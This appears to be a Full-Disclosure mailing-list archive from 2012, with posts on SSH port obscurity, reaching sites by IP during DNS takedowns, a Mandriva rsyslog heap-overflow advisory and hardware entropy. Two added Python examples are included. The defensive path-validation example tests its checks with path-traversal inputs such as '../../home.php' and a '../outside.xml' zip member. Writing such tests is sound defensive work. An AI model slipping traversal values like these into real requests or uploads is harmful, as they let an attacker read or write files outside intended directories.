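The two flaws in sections 2.1 and 2.2 (a cookie value used as an include path without validation, and theme archives whose contents are never restricted) each have a standard defensive counterpart: allowlist the name and confirm the resolved path stays inside the theme root, and inspect every archive member before extracting it. The following is an added Python example written for this archive, not the device's PHP code and not the author's; the theme directory layout, the name pattern, the extension allowlist and all sample inputs are assumptions.

```python
"""Defensive counterpart to the two flaws described above (added example).

The name pattern, the extension allowlist, the directory layout and the
sample archives are all constructed for illustration.
"""
import io
import os
import re
import shutil
import tempfile
import zipfile

# Assumed policy: theme/language names are short lowercase identifiers.
NAME_RE = re.compile(r"^[a-z0-9_]{1,32}$")

# Assumed policy: a theme archive carries markup and media, never code.
ALLOWED_EXT = {".xml", ".png", ".jpg", ".css", ".ttf"}


def is_within(base_dir, path):
    """True if path, once canonicalised, lies inside the canonical base_dir.

    realpath() collapses '..' and follows symlinks, so a candidate that
    escapes the theme root is caught even if the string looks harmless.
    """
    base = os.path.realpath(base_dir)
    target = os.path.realpath(path)
    return os.path.commonpath([base, target]) == base


def resolve_theme_file(base_dir, name, filename="home.php"):
    """Map an untrusted theme name to a file under base_dir, or return None.

    Two independent layers: the name must match the allowlist pattern (so a
    cookie value containing '../' is refused outright), and the resolved
    path must still be inside base_dir (defence in depth should the pattern
    ever be loosened).
    """
    if not NAME_RE.match(name):
        return None
    candidate = os.path.join(base_dir, name, filename)
    if not is_within(base_dir, candidate):
        return None
    return os.path.realpath(candidate) if os.path.isfile(candidate) else None


def vet_theme_archive(zip_bytes):
    """Return the reasons an uploaded theme archive must be rejected.

    An empty list means every member is a relative, non-traversing path
    with an allowlisted extension; directories are accepted as containers.
    """
    problems = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            member = info.filename
            parts = member.replace("\\", "/").split("/")
            if member.startswith("/") or ".." in parts:
                problems.append(f"{member}: absolute or traversing path")
                continue
            if info.is_dir():
                continue
            ext = os.path.splitext(member)[1].lower()
            if ext not in ALLOWED_EXT:
                problems.append(f"{member}: extension {ext or '(none)'} not allowed")
    return problems


def build_zip(members):
    """Constructed sample archive from a {member_name: bytes} mapping."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def demo():
    """Exercise both checks on a constructed theme tree; returns a result dict."""
    tmp = tempfile.mkdtemp()
    try:
        theme_dir = os.path.join(tmp, "theme")
        os.makedirs(os.path.join(theme_dir, "en"))
        with open(os.path.join(theme_dir, "en", "home.php"), "w") as fh:
            fh.write("<!-- constructed legitimate theme page -->\n")
        with open(os.path.join(tmp, "home.php"), "w") as fh:
            fh.write("<!-- constructed file outside the theme root -->\n")

        good = build_zip({"meta.xml": b"<theme/>", "img/bg.png": b"\x89PNG"})
        bad = build_zip({"home.php": b"constructed", "../outside.xml": b"<x/>"})
        return {
            "valid": resolve_theme_file(theme_dir, "en") is not None,
            "traversal": resolve_theme_file(theme_dir, "../../home.php"),
            "unknown": resolve_theme_file(theme_dir, "blub"),
            "escape_caught": is_within(theme_dir, os.path.join(theme_dir, "..", "home.php")),
            "good_zip": vet_theme_archive(good),
            "bad_zip": vet_theme_archive(bad),
        }
    finally:
        shutil.rmtree(tmp)
```

The containment check runs on the canonical path, so it also covers a symlink planted inside the theme directory; the archive check rejects members before extraction rather than cleaning up afterwards, which is the order that matters when the extraction target is served by the web interface.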



Re: [Full-disclosure] server security

2012-06-25 Thread Daniel Hadfield
It depends what the attacker's motive is. Is he/she trying to get as many
machines infected as he/she can, or is he/she trying to get into YOUR
network?

My 2c

On 21/06/2012 20:20, Thor (Hammer of God) wrote:
> I completely agree with Gage.  The way I see it, security through obscurity 
> is perfectly valid as long as the control remains obscured.  I think the 
> "anyone can just scan your ports" is somewhat specious in that most (if not 
> something like 99% or so (unqualified opinion of course)) traffic is simply 
> noise and scans for standard ports.  This is particularly true when it 
> matters most: during a worm outbreak or a newly published vulnerability.  
> Attackers simply don't have the time nor the inclination to go through and 
> perform slow and loud scans when they can quickly move on to the next target. 
>  If 90% of the targets have services on the default ports, then it makes far 
> more sense to just go after the easy targets.  
>
> Perfect case-in-point is the recent RDP unpleasantness.   Non-standard port 
> deployments were automatically removed from the target scans for 3389.  I 
> don't see how anyone can argue against the security value of such a 
> configuration.
>
> t  
>
>
>
> Timothy "Thor"  Mullen
> www.hammerofgod.com
> Thor's Microsoft Security Bible
>
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk 
> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Gage Bystrom
> Sent: Thursday, June 21, 2012 9:25 AM
> To: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] server security
>
> Well that's a bit of an iffy one. I'd say it IS a security measure, albeit one 
> that is solely effective if and only if compounded with other measures.
>
> It's unlikely, but you never know, you just might miss out on a nasty worm 
> all because you weren't running on a default port one day.
>
> On Thu, Jun 21, 2012 at 8:52 AM, Rob  wrote:
>> We need to make a distinction between security and obscurity here. The only 
>> time changing ports actually hardens a service in any way is when the port 
>> requires elevated rights to bind, changing to 1025 for example removes the 
>> root requirement. Any actual or theoretical vulnerabilities still exist. If 
>> somebody is looking at your server, they'll find the port without much 
>> trouble. Alternate ports can remove junk traffic from logs, so there is a 
>> benefit, if not entirely a security one.
>>
>> Rob
>>
>>
>> Sent on the Sprint® Now Network from my BlackBerry®
>>
>> -Original Message-
>> From: Alex Dolan 
>> Sender: listbou...@securityfocus.com
>> Date: Thu, 21 Jun 2012 07:44:57
>> To: Littlefield, Tyler
>> Cc: 
>> Subject: Re: server security
>>
>> One tip I have is to set SSH to a port other than 22. I don't need to 
>> tell anyone how devastating it is if someone did actually get access 
>> to that service. Putting it on some other port reduces your risk.
>>
>> On Thu, Jun 21, 2012 at 1:27 AM, Littlefield, Tyler  
>> wrote:
>>> Hello:
>>> I have a couple questions. First, I'll explain what I did:
>>> I set up iptables and removed all unwanted services. Iptables blocks 
>>> everything, then only opens what it wants. I also use the addrtype 
>>> module to limit broadcast and unspec addresses, etc. I also do some 
>>> malformed packet work where I just drop everything that looks 
>>> malformed (mainly by the flags).
>>> 2) I secured ssh: blocked root logins, set it up so only users in the 
>>> sshusers group can connect, and set it only to allow ppk.
>>> 3) I installed aid.
>>> 4) disabled malformed packets and forwarding/etc in sysctl.
>>> This is a basic web server that runs email, web and a couple other things.
>>> It's only running on a linode512, so I don't have the ability to set 
>>> up a ton of stuff; I also think that would make things more of a 
>>> mess. What else would be recommended?
>>> Also, I'm looking to add something to the web server; sometimes I 
>>> notice that there are a lot of requests from people scanning for 
>>> common urls like wordpress/phpbb3/etc, what kind of preventative measures 
>>> exist for this?
>>>
>>>
>>> --
>>> Take care,
>>> Ty
>>> http://tds-solutions.net
>>> The aspen project: a barebones light-weight mud engine:
>>> http://code.google.com/p/aspenmud
>>> He that will not reason is a bigot; he that cannot reason is a fool; 
>>> he that dares not reason is a slave.
>>>
>>>

Re: [Full-disclosure] How to access your favorite sites in the event of a DNS takedown ?

2012-06-25 Thread alan buxey
Hi,

> But after reading this article you will know how easily you can access your 
> websites. You can access them by typing their IP address in your web-browser.
> 
> Copy the IP addresses given below:
> 
> tumblr.com 174.121.194.34
> wikipedia.org 208.80.152.201

Partially true, and not always the case. The servers may be co-hosted, and if 
reached via IP address you wouldn't
be handled by the virtual hosting redirection and would therefore drop onto some 
other site/service/catch-all... The same is true if
you use alternatives to the old IPv4; for example, I prefer to access 
www.wikipedia.org via 2620:0:862:ed1a::1


alan
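
The mechanism behind alan's objection is name-based virtual hosting: several sites share one address and the server picks the site from the request's Host header, which a browser fills with whatever was typed into the address bar. The following is an added Python example, not part of the thread, that reproduces the exchange offline: a constructed two-site server on loopback (site names borrowed from the thread, page bodies constructed) and a client that sends the request either as a browser would after typing the IP, or with the Host header a hosts-file entry would preserve.

```python
"""Name-based virtual hosting, demonstrated on loopback (added example).

Both sites, their page bodies and the catch-all are constructed; nothing
here contacts the real addresses quoted in the thread.
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Constructed virtual hosts sharing one IP address.
VHOSTS = {
    "tumblr.com": "tumblr front page",
    "wikipedia.org": "wikipedia front page",
}
DEFAULT_SITE = "catch-all default site"


def select_site(host_header):
    """Pick a site from the Host header the way a name-based vhost server does.

    The port suffix is ignored and matching is case-insensitive.  Anything
    unknown, including a bare IP address (which is exactly what a browser
    sends when the IP was typed directly), falls through to the default site.
    """
    if not host_header:
        return DEFAULT_SITE
    name = host_header.rsplit(":", 1)[0].strip("[]").lower()
    return VHOSTS.get(name, DEFAULT_SITE)


class VHostHandler(BaseHTTPRequestHandler):
    """Server side: answer GET / with the body of the selected site."""

    def do_GET(self):
        body = select_site(self.headers.get("Host")).encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_server():
    """Bind an ephemeral loopback port and serve in a background thread."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), VHostHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def fetch(ip, port, host_header):
    """Client side: GET / from ip:port, sending host_header as the Host header."""
    conn = http.client.HTTPConnection(ip, port, timeout=5)
    try:
        conn.request("GET", "/", headers={"Host": host_header})
        return conn.getresponse().read().decode()
    finally:
        conn.close()


def demo():
    """Run the three exchanges the thread is arguing about; returns their bodies."""
    server = start_server()
    ip, port = server.server_address
    try:
        return {
            # typing the IP into a browser: Host carries the IP, not the site
            "by_ip": fetch(ip, port, f"{ip}:{port}"),
            # what a hosts-file entry (or curl --resolve) achieves: Host is the name
            "by_name": fetch(ip, port, "wikipedia.org"),
            "other_name": fetch(ip, port, "tumblr.com"),
        }
    finally:
        server.shutdown()
        server.server_close()
```

The practical consequence for a DNS outage is that a local hosts-file entry mapping the name to the address (or curl's --resolve option) keeps working where a pasted IP does not, because the browser still sends the site's name. Over HTTPS the same name is also used for SNI and certificate matching, so an IP-only request fails there even before the virtual host is chosen.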



[Full-disclosure] How to access your favorite sites in the event of a DNS takedown ?

2012-06-25 Thread Jardel
Do you know? Even in a DNS takedown you can access your favourite sites. 

People may think that in a DNS shutdown they lose access to the websites 
they are addicted to.


But after reading this article you will know how easily you can access your 
websites. You can access them by typing their IP address in your web-browser.

Copy the IP addresses given below:

tumblr.com 174.121.194.34
wikipedia.org 208.80.152.201

Original Article: http://cybermughal.blogspot.com/2012/06/how-to-access-your-favorite-sites-in.html



[Full-disclosure] [ MDVSA-2012:100 ] rsyslog

2012-06-25 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2012:100
 http://www.mandriva.com/security/
 ___

 Package : rsyslog
 Date: June 25, 2012
 Affected: 2010.1
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in rsyslog:
 
 An integer signedness error, leading to a heap-based buffer overflow,
 was found in the way the imfile module of rsyslog, an enhanced
 system logging and kernel message trapping daemon, processed text
 files larger than 64 KB. When the imfile rsyslog module was enabled,
 a local attacker could use this flaw to cause a denial of service
 (rsyslogd daemon hang) via a specially-crafted message to be logged
 (CVE-2011-4623).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4623
 ___

 Updated Packages:

 Mandriva Linux 2010.1:
 380e112c14082d15cca5e1bb9919f582  2010.1/i586/rsyslog-4.6.2-3.2mdv2010.2.i586.rpm
 0a485101e3f92899262a8d3082d3810f  2010.1/i586/rsyslog-dbi-4.6.2-3.2mdv2010.2.i586.rpm
 5d48f21f67c1a84ef66e19288ae9567a  2010.1/i586/rsyslog-docs-4.6.2-3.2mdv2010.2.i586.rpm
 80315f1b7f422b6b01fef01813e41821  2010.1/i586/rsyslog-gssapi-4.6.2-3.2mdv2010.2.i586.rpm
 9a341e46b5f367c9b8b7dfdc7a989db4  2010.1/i586/rsyslog-mysql-4.6.2-3.2mdv2010.2.i586.rpm
 6b6c0b4d0f5f2ebf2d376fa8c6c62049  2010.1/i586/rsyslog-pgsql-4.6.2-3.2mdv2010.2.i586.rpm
 3e8209ad7b579dd01f0981e78df8f6f9  2010.1/i586/rsyslog-relp-4.6.2-3.2mdv2010.2.i586.rpm
 2fe8bc6badc5dd5dfbe59b781abdd418  2010.1/i586/rsyslog-snmp-4.6.2-3.2mdv2010.2.i586.rpm
 9b56fe39f76363e49aef31175980402a  2010.1/SRPMS/rsyslog-4.6.2-3.2mdv2010.2.src.rpm

 Mandriva Linux 2010.1/X86_64:
 80aced08b93cf7362140d6ccec9f6ccc  2010.1/x86_64/rsyslog-4.6.2-3.2mdv2010.2.x86_64.rpm
 b99fac44b5f5c7577046bed76902c286  2010.1/x86_64/rsyslog-dbi-4.6.2-3.2mdv2010.2.x86_64.rpm
 b5020d7f1ab2c0af693d8d900fa89f5d  2010.1/x86_64/rsyslog-docs-4.6.2-3.2mdv2010.2.x86_64.rpm
 362b0e0550acc8485426fb3786c8fe6e  2010.1/x86_64/rsyslog-gssapi-4.6.2-3.2mdv2010.2.x86_64.rpm
 7ebd4c311d0321fa1890939b0de43c3a  2010.1/x86_64/rsyslog-mysql-4.6.2-3.2mdv2010.2.x86_64.rpm
 be3a1b1029de820708559545d37424e7  2010.1/x86_64/rsyslog-pgsql-4.6.2-3.2mdv2010.2.x86_64.rpm
 11d4ec93b3d8e3e445da2a07a95fd4fc  2010.1/x86_64/rsyslog-relp-4.6.2-3.2mdv2010.2.x86_64.rpm
 8e5b6cedca81e23d5c7a0cc580f666b6  2010.1/x86_64/rsyslog-snmp-4.6.2-3.2mdv2010.2.x86_64.rpm
 9b56fe39f76363e49aef31175980402a  2010.1/SRPMS/rsyslog-4.6.2-3.2mdv2010.2.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFP6DlLmqjQ0CJFipgRAiTLAJ4kgiHE0CUbzO1YRIP/18FMgLNh1wCdFmey
wvdYm6ytB01GvBxJN34aMQk=
=04hW
-END PGP SIGNATURE-



Re: [Full-disclosure] [SECURITY] [DSA 2502-1] python-crypto security update

2012-06-25 Thread BMF
On Sun, Jun 24, 2012 at 7:35 PM, coderman  wrote:
> how many of you fools mix a hw entropy source into your crypto keying?
>
> ever hear of 82802? XSTORE? RDRAND? lava lamps?

I have a server with one of these in it:

http://www.entropykey.co.uk/

although I still need to find a reasonably secure way to share the
entropy with all of my VMs where it is really needed.

BMF
